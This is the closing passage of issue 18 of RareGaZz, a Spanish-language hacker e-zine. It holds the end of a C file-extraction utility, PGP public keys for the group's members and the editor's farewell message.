fclose(in_p);
}
tmp = fn_p;
fn_p = fn_p->next;
free(tmp);
}
if (!j)
{
printf("No extraction tags found in list.\n");
}
else
{
printf("Extracted %d file(s).\n", j);
}
return (0);
}
/* EOF */
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
: : : :
RGZ_0A Llaves PGP Keys RareGaZz
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::


Siempre sera posible obtener las llaves mas 'actuales' de los integrantes de
RareGaZz, en la seccion STAFF de nuestra Pagina Web. Pero es bueno prevenir;
aqui tienen las llaves.



<++> r18/pgp/Ocsic.asc

pub 1024 0x2CA5AA90 1999-08-24 ---------- DSS Sign & Encrypt
sub 4096 0x4807B59F 1999-08-24 ---------- Diffie-Hellman

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

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
XiAhVsaVAJ4+W32o//aShux+Gz/k2CYqRRZTRg==
=niuY
-----END PGP PUBLIC KEY BLOCK-----
<-->


<++> r18/pgp/^Shadown^.asc

pub 1024 0x14A49815 1999-08-10 ---------- DSS Sign & Encrypt
sub 2048 0x5CE351FC 1999-08-10 ---------- Diffie-Hellman

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQGiBDewdE4RBADwVP96nauXxbvLNENeZYrvDVF+L59UygAFN5GyUOlMWKLOCJYX
ETlwkSHdhJ4yK+QXHdT7fVIxFSbUbPA2W1qRg070XGFXZUyd8KzIHRpYXxTfQ4Z9
T8Gy3Ah/Q3ug7ka1mSv+u0s2TLc/zzpn2avlqHDMe9LnNhb/dQuOyxhqHwCg/1PR
wkqWQ6VhvOVr/2WLRHAtQk0D/i0FyzXs4kXudugwi3Wa19yXR3NeJrNTRBYH4Ewe
1G8OCLSKA2i03h0coU9pnvrqSdmXaH3YveZcFyq8BLLPZR0t8CZOLoim2wn8HuSC
rfRR+dLdyGic6Yzkz9xlXIpY8lkW0DFfv2dwgRmU3Uw7vFWYc+cKhhNRQXvIOPBE
b+2LA/0bY6axVCqrgBcIxBdsShQQTCb46koc5/h7p4WuOZJsouhfa/TH2Ao2v5Kg
zYipelHJt3NG2cX+tVWrlCLI++GMrTDdhfpQnzphXmrY8TdDZdLJnoIo4dZNL4XP
nxC5J7s6d+gpiT3JU8Z/v7jXxDLAY9OHm58sfLNjA72uJR49NLQkXlNoYWRvd25e
IDxTaGFkb3duQGJhcmlsb2NoZS5jb20uYXI+iQBOBBARAgAOBQI3sHROBAsDAgEC
GQEACgkQYbpiyBSkmBV5uACg5vp2HtkVBLb/DZ1vfNor4zkydPYAnAp3713OS/yQ
uVKqOQEt+KR0uwUKuQINBDewdE4QCAD2Qle3CH8IF3KiutapQvMF6PlTETlPtvFu
uUs4INoBp1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89
PY3bzpnhV5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56NoKVyOtQa
8L9GAFgr5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsY
jY67VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6
ypUM2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpMgs7AAICB/9ZMU/n
2QMvtMWRp+o3N8hJXRMzfBWK/Uuq3+ena8VGrHXyoA/9QTNbTCaJTaEUSqtjRBYn
SOJlb9cfvlV5uwNFJYLv4ZHDXGv0TwNZbMjYCL4dWZOY/yaKFg0Ut48iOcyL0bPj
Grn8BrA0odpQXqAhJb7kNlR9iAcQiHzjvbTrF2XwXPknvyhXU5fwl+5LUbaZqNhE
FAA1sFktniOXgYshPqIGtZfQXdHdKl2Zd/K2cnuIAffFKDiHtlfvH4kLs9h5SlSt
cZfXodl+TxcEoELI9dke+HmUuJYqVCRN03znfIIUnDVlc5CyZYMlF/bwGAXwcVei
+1qLyWnJOadmoa6miQBGBBgRAgAGBQI3sHROAAoJEGG6YsgUpJgV/LYAnjQ7sSin
FSdirJmF4F/DCd/8GisYAKCFkOPu67W5Tug8ixlRKFwBIyEdzg==
=i8Hu
-----END PGP PUBLIC KEY BLOCK-----
<-->


<++> r18/pgp/ReYDeS.asc

sec+ 2048 0x6789D7C5 2000-12-15 ---------- RSA Sign & Encrypt

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQENAzo6GmoAAAEIAOtVxlSTe6qOAQ6efOSIbcWAYJBszzZp0gKRljfeMhSjTS0V
jEgSKXFcRorCKKo38r+E/7KPbAqpoxexk169NISQO7K43gKWL9WEl4CO5+0GTNLs
JdT3U/r0dE8X0va0GQcP2jnsZIYAA7tDCMVSRMq5Y/yu348gmxnLKDlyMfLyd1UM
ByZ61US9UvRkT9PGMha7FF76AUU/HZSOAyuXzH1rgG3RlNupOc7f+RONgrP9vEMU
zSz0AEytyjOzSyAjy0X1ML/afE5DQJNzDOKEgpMMtDG94pRde8LrJSUlhHw2mh8m
xcaSQ1CjJSfIZD3x2E2gqv93WxGWJbu2GWeJ18UABRG0BlJlWURlU4kBFQMFEDo6
Gmolu7YZZ4nXxQEBjcwIAMKc1q09CuhqXlhzTj8/mGX2o5eG9xKoS/bvqSc5QlYH
ZWbH+WYb1GxrBDWjlIf4TV76vqSdDqMi72GqcwIw5dgeiSyTknwMoNMKbIH6ogxF
K8sQREr6YhDf8frRDLClQH3Qx2m0qYLhMNpz7fhlJoxIzGIXPmpPPvq55obsvfYo
rVLLgZn2TkDJAoLl1On1bTUBTpbNT/tEZZR7qBTqt4SSVQD/7s2+KmZx7xwhwHYh
SNiFWpdXGRmKMjnYF9HlZKan+mw27eujhWcDUOjv82WJ95aS0+BvKqHyBAHCLPmR
sYELhKfJikpiiMgY3QNU8xGNThhZ70m33TfI3EYEUEs=
=feOU
-----END PGP PUBLIC KEY BLOCK-----
<-->


<++> r18/pgp/MagiCs.asc

pub 1024 0x93D050DF 2001-09-22 ---------- DSS Sign & Encrypt
sub 1024 0x5DB7D0E2 2001-09-22 ---------- Diffie-Hellman

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQGiBDusVroRBACTSAyDWi93ySict99GO36SDj27BKlcPdflkH9EVWbcwNEZidjv
P5ouHk/guXwuNmWYnTVC/djDIbUn2pWBWBpKCYciSNcAApOsrbjTQAwVFTlqVHCg
fDJB/rFvg4SqWhgzkZ84LEAj8tUWHOZFaYFkMAWZJCw7B3NOZE3y+6hJLwCgiCtn
8xh3ibH6VFax5kM00rj///ED/1AKULKZn/ftL1/JpFyayxwP8QuiPjlJEpeJ3+ct
3a0yZVKzXb1GDI3U3UM7svSmFfhe3TV+C197TsxFJjomvvJI3ASFsF8BSa3g4dXy
m8UdHYZcivrbFYEqSDYCcoWZkbiAfNiXM0Q9pQ0FvlE37mC/3aVwTvd3dFG/T4kq
gMjkA/wLSYudq0iuKjw4njfj7PsNuGWus10wLvwuUY9Sd+FgW3KK6ivaxP9ACS/B
qXfGuk1uEaDiIFNWIVZlLDDAT6Ge1CjR+OhYLozzuGzFDe1mqZwN+QyuvfJ7zuph
nqJlq66edxuOT0GkGe9aj8B3d1N7d7V4dMglSo/jl6BLERqX7rQrSmFpbWUgKElu
Zm9ybWF0aWNvKSA8TWFnaUNzNjY2QGhvdG1haWwuY29tPokAVgQTEQIAFgUCO6xW
ugQLCgQDAxUDAgMWAgECF4AACgkQAWCrypPQUN/nfQCcDus4ugPRdQtFEoZvO7ou
Cz8K5RoAnRXfeVccdNJYJLeqqNfzl26xi6oCiQBGBBARAgAGBQI7rFheAAoJEAfG
pAK/dD8sOhcAn3DTGriWkDYw+V6JjLt+V178AbGwAJ9KN3KnzY4loEQ4hO/4FRhD
K1ZugrkBDQQ7rFbAEAQAkkKt2S4tUk74hoSGxYHOVazD/rSvG3biiRxv3JEo3K0r
MI4IiEaDSnHheRtNBQ+jTf+YaYmAPjWUqy1PMvt77lJROLPIU7qzeMCn1EqkUQhf
R0oyT8TXDNNodaAhPf3pNTieUUl/5XRd8jor4dqN01oLCvLB7jIP/xq8WXJMXg8A
BAsEAIWYUoPXInVYxCWli/6l60HI0H4xPId8NbHQN+MXNFnelmNYslgZYmF2GTSV
lKh5JxMdwDUNzYw8wXe8aTqvowNlTCimHE3gZu6/xUpzGLOqtxph3C1uafSpgYEP
5MvuwKo9IfW7PCDgESTXF+MgYgzvia9Bo2GWKXz2Y2Pp/tcdiQBGBBgRAgAGBQI7
rFbAAAoJEAFgq8qT0FDfFJgAnjRb3dFRzZLjwEgDx8Yvxt6T0/JOAJ4u43tU+CIF
oSZkOyGOBq9pj91Nbw==
=qWAv
-----END PGP PUBLIC KEY BLOCK-----
<-->


<++> r18/pgp/alt3kx_h3z.asc

pub 2048 0x523C461B 2001-11-07 ---------- RSA Sign & Encrypt
sub 2048 0x8D7DC0C7 2001-11-07 ---------- Diffie-Hellman

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQENBDvpMUYBCAC8MCHwKly4HTzeQ5AKZYprGcYkCTQnVVxIouxEjMpyvsAvXiJr
baqjIToDtoDC293I+Dq4avPqhkMUp7OKVK9Z0BGk21uvS+EFyFTBE48GiYkQnwuA
yL3+7TmUq+muP4Prc7ku/B7oZNkGK16kSbH9gsIzzaZIqKvh02T5Rr9IKWudGeGH
7RdqKZ7AHiiUMnYLb8m0A5mezL0bCQ7J6qu1xY6YT9fkp8BMbbrabagDlPK/xjvq
hcvR2kQchY6brjJ0fw/dpJ0Kdjsdh1NHJldLPyWTIs0SOGEK1BeA3Ngwi6xZU/Re
6+xp+VCexmCLBUJFf11suquiyRgNPFxSPEYbABEBAAG0H2FsdDNreCA8YWx0M2t4
X2gzekBob3RtYWlsLmNvbT6JAS4EEAECABgFAjvpMUYICwMJCAcCAQoCGQEFGwMA
AAAACgkQq+FtTbq+jnC/KAf7BWzGQ91nc7KCtTzMFkE9Vf0sKcwyJh2o/7oa6NCb
GIzsH5lEyOkg2sLaKu/6sai2VGInjsUpTHe27c44acFfLqSSdAO1STl4nQcXiycS
CNfEZBrhWzbgR4BXBEHq65a5zIAjfXPHYOF6KQh0+eyCRrm4577FdqT/+FB03IQ/
NnfPjte7MaOExJWhGWiXvkzvbWgMEveGns79G93TLB16bhVjQimvNqKrIckvUYIy
eCBOMia26OQh8Krj+fznDRl7D8JgXYZYVHp3Z5a+XrCfzl/C9xs6xwvlawZZDd7o
Q89HWPjADcB5N1CKufq9SkmUb76Tsr4JJavDaXijDn5ZKrkBDQQ76TFSAQgAyzi2
l3qLyMzLJLqkSKeQfeSP7Q26m2FCgDpH/ldvExdIOvllfhCrUekcwEZyHwmXZvdK
sQNqQs8Qk0BXDehO54mAadgSBLfvICDXSRzfwLI02L9bpjjlWaZKut9WxqPUrgMs
zPu/jWOT+9BGcR/Kq866rx94/8sUXxhOv2+L9ev56WqUwSa+llJsLLyGSbQLe3Bw
jUCTwCddonS3YYvDpjg6sK+jCMCTxapV1a3cSnNyJHBO3Nn8NciRKLlratsAG5xW
u+vdZcva6F7eTYios8zbHthOBquP2cNukfvRwDe9fdIGCrR4hDidH/CRzxobzLNc
x/tfoeDtx1yijX3AxwARAQABiQEiBBgBAgAMBQI76TFSBRsMAAAAAAoJEKvhbU26
vo5wPCQH/3iYQpBfwTg5/q9vJPxj1Xdl/fmty+wlquLN79VOxYNMTR7NID+dG2Lf
V5cIhTI7zR4dvjJ1LzwaZkIo/g5yCsp+EbC/DqLfzT+/GtnGD0CXmuGNryLmceX1
ISkVMGcXIZkOCv0QfVzAncJshkyJJP2sikKlhTUxKQ0iaSOeA3jF+biS7/A5nxCQ
OwcPbzXrF7S5E/DE9N0hJZ0oUWu+o7PLRrMKUqoA3ieknwqmq3jCTT1vLjZtFzJj
jYtufvRL5YDUMXZIDzD8YbrAgE/j0e69AqDoqhpnnkZeNC1fDTF/rwatKd376poc
yy07M8/T/xCA40fp30+F8TYswP9YKXY=
=GCXJ
-----END PGP PUBLIC KEY BLOCK-----
<-->


<++> r18/pgp/Yo_Soy.asc

pub 1024 0xF25B97BC 2001-07-28 ---------- DSS Sign & Encrypt
sub 2048 0x6E4D3161 2001-07-28 ---------- Diffie-Hellman

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQGiBDtiLq0RBADK+6Yj3jgpIxrrQPluXyK9wXUsaayeon61TRSbWy0bPdbwbCp2
rClT9UUOgS3sePtrpghZgwJUrAiF8eOCihQEJlwdK1I4XlJqGkKRBTRoDDUsmdFj
uWQMhI3Hq8kRJw3WLDEBMk2zoTYOgO/vUAjOPwAupSCHuTkHUzVKG3/uYQCg/0Oi
wrny9DZlfSLPbH4WC9dC8GcD/0tkLrzaOHvBjqFlGtU2khHVLPQjXXXwd7xr/iaK
euc5AYUmKeJXG7FzJnOGb8e+QpxDn/y88ZHwVaHTwzcQworNSbeOS2xknV2yYtAA
TEDuWN8g9LAygxe80PlpUpZDRkaL2SEU+T+LbiyN0wS7fdT+K9QrpzGCEJ5IsTLD
UBSgA/wPmtNyDd2Vlg5CqvtcAsv9myRb520+wgGVP3GFTT3hifpjsPwo1YSJzpGi
2wqKNQ0VtOchmNMx/3tAfr7QrHwq9JyR0YKqrvQzlqBJEKDBnpiOe933KLJIi8m8
OZ59zYqTceutqRxShsJjCRmEx9BhabppCHCZekURMD7fI2836bQeWW9fU295IDx6
dWlrMGRlbkB5YWhvby5jb20uYXU+iQBLBBARAgALBQI7Yi6tBAsDAgEACgkQRAFl
dfJbl7zeDACgtStfMyxG1XICkAeby98f3NHft7AAoJrd55nmKFBfZjhv+wKb4mEv
8xCJuQINBDtiLq8QCAD2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4INoBp1aj
FOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3bzpnhV5JZ
zf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56NoKVyOtQa8L9GAFgr5fSI
/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsYjY67VYy4XTjT
NP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AK
UJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpMgs7AAICB/9LtwJ22dwN7t+X9mpM
kcd1iVcLzpyUgkEOBcC+CKaucQ8LBPUfnmAlMT4ERRgH/gp2OEWbHImfYSAmsWm1
REV/cfTvtn9w5XnOX3ok88eef17uZO7Ro/q8l9iPrDrfbWRKVzQy5mwj/YwcHeHn
PGK/Wd17mnbtOXQQ41s2ULSBJWoKxTOXQfiKhonsoLHyVSmCfTIZqE6l49saTean
SEmJeEop2812Mp5IwpV5EBBNX3rNJmFbOlbIlEylXFQ967+X3B2+QhK9US92BaDv
mkNPcf7D3oBQNk6Ky//tcjq8+YMKs5+wgGMz6pYLr8wWFcCHqzUjLsEloZdPjzOK
JU3YiQBGBBgRAgAGBQI7Yi6vAAoJEEQBZXXyW5e8SFUAoJ7jNjimUnoAZMFfP5rw
QuPdJVX/AKDVvu8drQmKxURfwX5xAKxMGSALTA==
=a1Xk
-----END PGP PUBLIC KEY BLOCK-----
<-->


<++> r18/pgp/enan0.asc

pub 2047 0x2A15E289 2000-07-13 ---------- RSA Sign & Encrypt

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQENAzltRosAAAEH/3Q1cvJY5s8JXAB93SM63EwW3C/uEdBjlM95yBDYW17nv/rc
v0bQrfBSJ6VFeOxoDWk/K1gYx2pwxt1ij/17NIJRW8I5rxMynjLABqv2Ak50xKL2
DnS/DOHZ64edC5R5Qa9PFqC5TUBfqdv9D23VIxBT+Olw4VeL+d1M7S5lbIGT3o9Z
Mj4S/TxOVSX5gSrMmhgnBOC0REuwGUMlByQiDLBVZdeuXQK//c+Y8ksCz/QRbhTC
bOE9UZ8kMWvSaHU5LEAuCM1voEI7RyNcT8G+x60l6jQKXYv48BQLcTXhp/OrVaGM
Zlq2BIISFpciSP1UNXWjLcQEgGHAJEU6XSoV4okABRG0BWVuYW4w
=Mwlv
-----END PGP PUBLIC KEY BLOCK-----
<-->


<<::RareGaZz::>>
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
: : : :
RGZ_0B Despedida RareGaZz Editor
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::



Todo tiene un final, aunque no es necesario que lo recuerde. Lo bueno dura
poco, y RareGaZz NO deberia contradecir esta regla ;). Ha finalizado RareGaZz
18, y se avisora lejanamente una RareGaZz 19.

Pero tomar en consideracion que ello depende de nuestras investigaciones y de
vuestras colaboraciones. Aunque siempre podreis estar atentos a nuestra Web;
de igual manera al e-mail de RareGaZz; al e-mail del integrante mas cercano a
vuestro pais y estar subscritos a nuestra lista moderada RareDudeZ.

Es todo.

Disfrutad las celebraciones de culminacion anual.

Y sera hasta el 2002!!...


<<::RareGaZz::>>

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT